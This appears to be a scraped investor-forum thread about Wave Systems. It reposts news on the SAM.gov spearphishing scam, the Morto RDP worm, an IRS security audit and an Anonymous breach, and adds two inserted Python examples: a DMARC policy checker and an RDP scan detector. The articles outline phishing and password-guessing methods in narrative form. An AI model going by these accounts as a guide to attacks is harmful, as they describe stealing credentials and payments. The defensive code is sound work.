According to the executive, the spearphishing was enabled by shoddy security on the website itself, GSA’s System for Award Management, or SAM.gov, which didn’t provide two-factor authentication or use an email protocol designed to protect against incoming emails with spoofed domain names in their addresses. Targeting was also aided by the rich data the website provided.
The scammers “didn’t need to do any reconnaissance or research, the usual kind of social media engineering” to find out who at each company controlled the SAM.gov account, the executive said. “SAM.gov handed them the targeting intelligence they needed for the campaign.”
The public website has a search function that enables visitors to identify the point of contact for any company with an account on the site — which contractors can use to manage the payments they receive under federal contracts.
“It’s a spearphishing guide,” said the executive, who asked not to be identified because of the sensitive nature of the case. The emails sent to the points of contact “were very high quality,” said the executive, adding that they appeared to come directly from SAM.gov and contained a message asking recipients to click on a link to a fake login page. “It was a high quality facsimile of the real page,” the executive said. When the recipient entered their username and password, the page harvested them, then redirected the user to the real site, along with random login data.
“What you see next [after entering your information] is the real login page with the error message, so you think you’ve fat-fingered it,” explained the executive.
Having harvested the credentials for the account administrator, the hackers were able to login and use the site’s management functions to change the bank accounts into which federal payments were delivered.
Security experts say such attacks can be prevented by at least two baseline best practices that SAM.gov lacked:
• Two-factor authentication (2FA) — requiring the user to identify themselves via a secure hardware token or one-time passcode sent to their mobile phone, in addition to their password. But SAM.gov didn’t offer that option for account administrators, the executive said.
• DMARC, or Domain-based Message Authentication, Reporting and Conformance, is the industry standard measure to prevent email spoofing — when hackers make their messages appear as if they come from trusted correspondents. If DMARC had been deployed and enabled, spoofed emails purporting to come from SAM.gov would have been marked as spam or simply discarded. SAM.gov has a DMARC record, but enforcement has not been switched on.
A GSA spokeswoman declined to address specific questions about 2FA and DMARC. “This is an active law enforcement-sensitive investigation,” she said in an emailed statement. “GSA has made public as much information as it is able on our website and will continue to update accordingly.”
The executive from the targeted company was very critical of SAM.gov’s security. “It’s ridiculous how poorly put together that site is,” he said, adding that when the company first discovered the cyberattack, he struggled to find a point of contact at GSA to report it to.
“I couldn’t convince anyone to listen to me,” he said. After his initial contact with federal investigators last year, “There was silence for months,” he said.
“Once they knew there was a problem, they had a responsibility to notify the site’s users… Everyone with an account should have been told to check whether their banking information had been changed … There are a thousand things they could have done.”
“The problem is not they had a problem, everyone has problems” concluded the executive. “The problem is the glacial speed with which they’ve responded.”
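The "DMARC record exists but enforcement is not switched on" condition the article describes is something a defender can check from the domain's `_dmarc` TXT record. The following added example (not from the article, and the records are constructed, not SAM.gov's) parses a DMARC record and classifies it as monitoring-only, partially enforced, or enforced.

```python
"""Classify a DMARC TXT record by how much it actually enforces.
Added example; the sample records below are constructed."""
from typing import Dict, Tuple

ENFORCING_POLICIES = ("quarantine", "reject")


def parse_dmarc(txt: str) -> Dict[str, str]:
    """Split 'v=DMARC1; p=none; rua=...' into a lower-cased tag dictionary.
    Tag names are case-insensitive; values are kept as written."""
    tags: Dict[str, str] = {}
    for part in txt.split(";"):
        name, sep, value = part.partition("=")
        if sep:
            tags[name.strip().lower()] = value.strip()
    return tags


def assess_dmarc(txt: str) -> Tuple[str, str]:
    """Return (status, reason) for a DMARC record.

    status is one of:
      'invalid'          not a usable DMARC record (wrong version or no p= tag)
      'monitoring-only'  p=none: reports are sent, spoofed mail is still delivered
      'partial'          enforcing policy applied to only pct<100 of failing mail
      'enforced'         p=quarantine or p=reject applied to all failing mail
    """
    tags = parse_dmarc(txt)
    if tags.get("v", "").upper() != "DMARC1":
        return "invalid", "missing or wrong v= tag"
    policy = tags.get("p", "").lower()
    if policy not in ("none",) + ENFORCING_POLICIES:
        return "invalid", f"unknown or missing policy {policy!r}"
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        return "invalid", f"bad pct value {tags['pct']!r}"
    if policy == "none":
        # This is the state the article describes: a record is published,
        # but receivers are told to take no action on failing messages.
        return "monitoring-only", "p=none delivers spoofed mail unchanged"
    if pct < 100:
        return "partial", f"p={policy} applied to only {pct}% of failing mail"
    return "enforced", f"p={policy} applied to all failing mail"


# Constructed records: what _dmarc.<domain> TXT lookups might return.
SAMPLE_RECORDS = {
    "monitor.example": "v=DMARC1; p=none; rua=mailto:dmarc-reports@monitor.example",
    "partial.example": "v=DMARC1; p=quarantine; pct=25; rua=mailto:d@partial.example",
    "strict.example": "v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s",
    "broken.example": "v=spf1 include:_spf.broken.example -all",
}

if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        status, reason = assess_dmarc(record)
        print(f"{domain:16} {status:16} {reason}")
```

The record text would come from a TXT query of `_dmarc.<domain>`; the function deliberately takes the string so it can be run on a saved record without network access.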
They've got your money and your data. Now hackers are coming to destroy your trust
Nation-state attackers are attempting to undermine trust in critical services -- so how do we go about stopping them?
http://www.zdnet.com/article/your-money-and-data-is-not-enough-as-hackers-take-aim-at-bigger-targets/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem:+Trending+Content&utm_content=5abd575804d30101340f557e&utm_medium=trueAnthem&utm_source=twitter
Shouldn't there be a system of having known devices and unknown devices, thereby letting a company or government keep the unknown devices (the bad guys) off the network? Or a known device that shows itself in nefarious activities gets booted off the network. It would cut down on all the manpower it takes to watch criminal activity (unknown devices). It could help by making an activated TPM the known device. Wave and/or ESW would help in this process by turning on these TPMs.
RSA conference with Intel and General Electric
#RSAC San Francisco. @TrustedComputin @intel @generalelectric security experts to talk #TPM to ensure manufactured devices are tamper-proof. https://t.co/tLIfsENv6o
— Trusted Computing (@TrustedComputin) March 28, 2018
Safend
How did the Wave trustee end up paying that other company over a million dollars in bankruptcy when Wave bought Safend for about 11 million in Wave stock a few years ago AND THEY RETAINED THE SAFEND TECH??
Is Rivetz borrowing pieces of Wave's technology?
They have quite a following on Twitter with new partners all the time. It would be a shame to see Wave reborn as a successful Rivetz.
Bankruptcy
Bankruptcy appears to be coming to a close in a couple of weeks. If Wave were somehow able to get a military contract or government contract then that could change. imo. Why Wave has been unable to get a follow through government contract after all these years seems a bit crazy especially with a military veteran like Bill Solms at the helm with his military hire(s).
New Windows worm spreads by attacking weak passwords
Admins spot 'Morto' worm after seeing jump in remote access connection attempts
By Gregg Keizer
August 29, 2011 12:10 PM ET
Computerworld - A new Windows worm is working its way through company networks by taking advantage of weak passwords, security researchers said over the weekend.
The worm, dubbed "Morto" by Microsoft and Helsinki-based F-Secure, has been circulating since at least last week, when company administrators noticed systems generating large numbers of unexplained connections to the Internet.
According to Microsoft, Morto is the culprit.
"Although the overall numbers of computers reporting detections are low in comparison to more established malware families, the traffic it generates is noticeable," said Hil Gradascevic, a researcher with the Microsoft Malware Protection Center (MMPC), in a Sunday blog.
Morto spreads using RDP, or Remote Desktop Protocol, the Microsoft-made protocol for controlling one computer by connecting to it from another.
All versions of Windows from XP on include client software that uses RDP to remotely access machines. The software, called Remote Desktop Connection (RDC) in XP, Vista and Windows 7, requires a username and password to log in to a remote system.
Windows PCs infected with Morto scan the local network for other machines that have RDC switched on, then try to log in to a Remote Desktop server using a pre-set list of common passwords, said F-Secure. If one of the passwords works, the worm then downloads additional malware components to the just-victimized server and kills security software to remain hidden.
The scanning for potential targets generates significant traffic on TCP port 3389, the port a Remote Desktop server monitors for incoming access requests.
That traffic caught the attention of puzzled network administrators starting last Thursday.
"Every 10 min. or so, a flood of TCP 3389 connection attempts out to seemingly random IP addresses," reported a user identified as "BarrySDCA" in a Friday message posted to a Microsoft support forum. "Our firewall is blocking it from getting out and it keeps trying."
That thread currently has nearly 70 messages and has been viewed by others almost 6,000 times, both large numbers for a discussion that started only days ago.
Analyses done by Microsoft and F-Secure identified the list of weak passwords the worm tries, which includes such too-easy examples as "password," "123456" and "abc123."
"This particular worm highlights the importance of setting strong system passwords," said Microsoft's Gradascevic. "The ability of attackers to exploit weak passwords shouldn't be underestimated."
Morto's purpose may be to crank out denial-of-service attacks against hacker-designated targets, said Microsoft in the write-up published Sunday.
Although Microsoft patched RDP just three weeks ago as part of August's monthly security update, Morto does not exploit that vulnerability, or any other in the protocol.
http://www.computerworld.com/s/article/9219555/New_Windows_worm_spreads_by_attacking_weak_passwords
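The symptom the administrators in the article noticed, bursts of outbound TCP 3389 attempts to many different addresses, can be turned into a detection rule. This added example (not from the article or from any vendor's analysis) parses constructed firewall log lines and flags any source that reaches a threshold of distinct port-3389 destinations within a sliding time window; the log format, addresses and thresholds are all assumptions.

```python
"""Flag hosts that fan out RDP (TCP 3389) connection attempts to many targets.
Added example; log format and all addresses below are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed log format: "<iso-timestamp> <ACTION> TCP <src>:<sport> -> <dst>:<dport>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>[A-Z]+) TCP (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line: str) -> Optional[Tuple[datetime, str, str, int]]:
    """Return (timestamp, src, dst, dport), or None for lines that don't match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"])


def find_rdp_scanners(lines: Iterable[str], port: int = 3389,
                      window: timedelta = timedelta(seconds=60),
                      min_targets: int = 10) -> Dict[str, int]:
    """Return {src: peak distinct destinations} for sources that contacted at
    least min_targets distinct hosts on `port` within any `window`.
    Counting distinct destinations (not attempts) separates a scan from a
    legitimate admin retrying one server."""
    per_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[3] == port:
            per_src[parsed[1]].append((parsed[0], parsed[2]))

    flagged: Dict[str, int] = {}
    for src, events in per_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:  # slide the window
                start += 1
            distinct = len({dst for _, dst in events[start:end + 1]})
            if distinct >= min_targets:
                flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged


def _make_sample_log() -> List[str]:
    """Build constructed log lines: one infected-looking host, one admin, noise."""
    base = datetime(2011, 8, 25, 9, 0, 0)
    lines = []
    # 10.0.0.5 sprays 15 blocked attempts at pseudo-random external hosts in 30 s.
    for i in range(15):
        ts = (base + timedelta(seconds=2 * i)).isoformat()
        lines.append(f"{ts} DENY TCP 10.0.0.5:{49152 + i} -> 203.0.113.{(i * 37) % 251 + 1}:3389")
    # 10.0.0.9 is an administrator opening two legitimate internal RDP sessions.
    lines.append(f"{(base + timedelta(seconds=5)).isoformat()} ALLOW TCP 10.0.0.9:50000 -> 10.0.1.20:3389")
    lines.append(f"{(base + timedelta(seconds=40)).isoformat()} ALLOW TCP 10.0.0.9:50001 -> 10.0.1.21:3389")
    # Unrelated traffic and a malformed line, both of which must be ignored.
    lines.append(f"{base.isoformat()} ALLOW TCP 10.0.0.7:50002 -> 198.51.100.3:443")
    lines.append("garbage line that does not parse")
    return lines


SAMPLE_LOG = _make_sample_log()

if __name__ == "__main__":
    for host, peak in find_rdp_scanners(SAMPLE_LOG).items():
        print(f"{host}: {peak} distinct RDP targets within 60s")
```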
Auditors: IRS plan compromises security for e-payment users
By Aliya Sternstein 08/19/2011
The Internal Revenue Service glossed over computer security in planning for a new tax return law that applies to e-payment processors, government investigators said. The law kicks in during the 2012 filing season for the 2011 tax year.
A tiny provision folded into the 2008 Housing and Economic Recovery Act stipulates that companies handling credit card transactions for merchants, such as PayPal, Amazon and traditional banks, must report the gross amounts of merchants' transactions along with the vendors' sensitive personal information starting in tax year 2011. The Treasury Department estimates that clamping down on sellers that are under-reporting sales, by comparing self-reported gross figures to the payment processors' numbers, will generate nearly $10 billion during the next 10 years.
But the law will add millions of additional reporting documents to IRS computer systems, according to federal auditors. And the agency's strategy for applying the law "does not consider the security of the computer systems being planned and changed or the new data being received," Michael R. Phillips, the Treasury Inspector General for Tax Administration's deputy IG for audit wrote in a July 26 report released Thursday.
The new provision will require that the IRS store the names, addresses and taxpayer identification numbers, or TINs, of the sellers that each third-party processor submits. Only merchants that amassed more than $20,000 in payments from more than 200 transactions in a single year are subject to the new rule. Small vendors often use their Social Security numbers as their TINs, so the reporting could put them at greater risk of identity theft, say some privacy groups, such as the Center for Democracy and Technology.
"CDT continues to have concerns about government requiring private entities, in this case payment systems, to collect and keep more sensitive personal information than they would otherwise need," David Sohn, senior policy counsel for the center, said on Friday. "Data breaches continue to be an unfortunate fact of life, so forcing companies to hold on to sensitive data to assist the government in tracking user behavior carries real risk."
The security policy lapse follows repeated criticisms from TIGTA and the Government Accountability Office during the past few years about glitches in IRS computers. Most recently, the inspector general issued a report in late June that stated software housing taxpayer information had not received the latest bug fixes, and the agency was not running appropriate vulnerability scans on all databases. GAO revealed in March 2010 that the IRS did not consistently use strong passwords, restrict access only to personnel whose jobs required logging on to systems, or keep track of breaches.
"In light of issues related to system security previously reported by the GAO, we expected the IRS to have more detail of the security considerations in its plan," Phillips wrote.
On Friday, a TIGTA spokesman said the IRS has since informed auditors that, after the review, the agency added particulars on computer security to its rollout plan. "TIGTA has not performed a follow-up review of the implementation plan to confirm the IRS' statements that details on computer security had been added," the spokesman said.
IRS spokesman Eric Smith on Friday was unable to comment on whether there has been an addendum.
During their audit, inspectors also discovered that a risk assessment of the new reporting program makes no mention of security reviews. "Sensitive taxpayer data could be at risk of disclosure," the report stated. "We believe that because of the significant risk associated with transmitting and storing large amounts of sensitive data, the effect if the data are compromised, and [given] the fact that the IRS has been criticized in the past for security weaknesses, the IRS should have specifically addressed this issue in its risk assessment to ensure all necessary steps were taken and contingency plans were developed as necessary."
The safety of consumers' personal information is not at issue because the payment processors will not be reporting individual buyer transactions to the IRS.
Faris Fink, IRS commissioner for the small business/self-employed division, responded to draft IG findings with a June 8 memo, saying security controls mandated by the 2002 Federal Information Security Management Act are required to be in place to ensure the protection of sensitive data. "These controls are tested and any risks are identified along with mitigations prior to system production," he wrote.
On Friday, Smith said the IRS does not discuss specifics about the agency's information safeguards, but "security is a cornerstone of our operations involving sensitive data, and we follow FISMA security protocols."
http://www.nextgov.com/nextgov/ng_20110819_2747.php?oref=topnews
Anonymous hacks defense contractor: Email data, 'schematics' stolen
By Zack Whittaker | August 19, 2011, 8:37am PDT
Summary: Anonymous hackers have released another large cache of data, this time belonging to a senior vice-president of a defense contractor, with links to the FBI.
Hacktivist group Anonymous has infiltrated and downloaded sensitive email messages of a major U.S. government defense contractor.
The email data, purportedly belonging to Richard Garcia, senior vice president at Vanguard and former FBI agent, belongs to Vanguard Defense, a military contractor, which makes unmanned drones for the field.
The documents are publicised in a post on Pastebin, which links to the leaked cache of documents and data on another site.
The hack is said to have occurred by exploiting weaknesses in the WordPress blogging system, through two outdated plugins.
Part of the wider AntiSec movement — devoted to releasing data held by high-profile targets lacking appropriate security — this comes as another blow to the U.S. law enforcement capability, only a fortnight after AntiSec hackers released the largest cache of law enforcement data to date.
The Anonymous group in a statement says the leak contains: “internal meeting notes and contracts, schematics, non-disclosure agreements, personal information about other VDI employees, and several dozen “counter-terrorism” documents classified as “law enforcement sensitive” and “for official use only.”
It is not clear whether the ‘schematics’ stolen relate to the drones manufactured by Vanguard Industries or not. The email data, however, are marked as classified material, with “confidential” and “for official use only” markings.
The hackers did not point to a reason why Vanguard Industries was targeted, except crediting the hack as part of the ongoing “F**k FBI Friday” campaign.
“We are doing this not only to cause embarrassment and disruption to Vanguard Defense Industries, but to send a strong message to the hacker community. White hat sellouts, law enforcement collaborators, and military contractors beware: we’re coming for your mail spools, bash history files, and confidential documents”, reads the Pastebin-posted statement.
Another key message in the statement points to InfraGard, which the message calls a “sinister alliance of law enforcement, military and private security contractors” which protect infrastructure that “[Anonymous] aim to destroy.”
http://www.zdnet.com/blog/btl/anonymous-hacks-defense-contractor-email-data-schematics-stolen/55494
Waveduke - You have to be careful with phrases like 'in the not too distant future'. I think SKS has a TM on the phrase and that too could mean 'anytime' in the future. I, like every Wavoid out there, am hoping for the best. Thanks for your insights and humor. I'm working through this WIRBRS.
Waveduke, there is no doubt about the great benefits of this technology and, as you pointed out, the key locations that Wave has put itself in. If the technology is so great then why is it taking so long? I know we have just really reached a point of market saturation with TPMs. The runway seems to get longer and longer and I think that is why the WIRBRS virus hit me all of a sudden. BASF was back in April. Wave has announced nothing of significance and BP is end of 3rd quarter, maybe 4th, with north of 2 million. Sprague said they were working with 6 to 10 large companies LAST YEAR and we have seen partial GM and BASF. Now Wave is working with 10 to 20 large companies? What happened to the 6 to 10???? What keeps every Wavoid hanging on is maybe they are virtually on the cusp and I've waited this long so what's a little while longer.
Long and waiting. I have a question for you. When are we going to get a real surprise conference call? I haven't seen one in 40 quarters, maybe my expectations are too high or the previous CC helps set those expectations. I'm working this WIRBRS out of my system today. I wonder if anybody noticed...
Waveduke - thanks for the laugh. It would just be nice to see (besides the cc) something from Lee. It's been so quiet. Those 6 to 10 co's were about a year ago. Anyways, 10 years plus and still hanging in there. I bet I'm not the only one with WIRBRS. Again, thanks for the laugh.
Genz2
Past CC's
Do you ever notice how all the analysts say "good quarter, SKS" before they ask him a question? It would be nice if an analyst said "lousy quarter, Steven, why aren't you profitable?" The reason I say this is because it seems like it's become acceptable to not be profitable. We're thanking SKS for another non-profitable quarter. Isn't being profitable one of the chief aims of a corporation?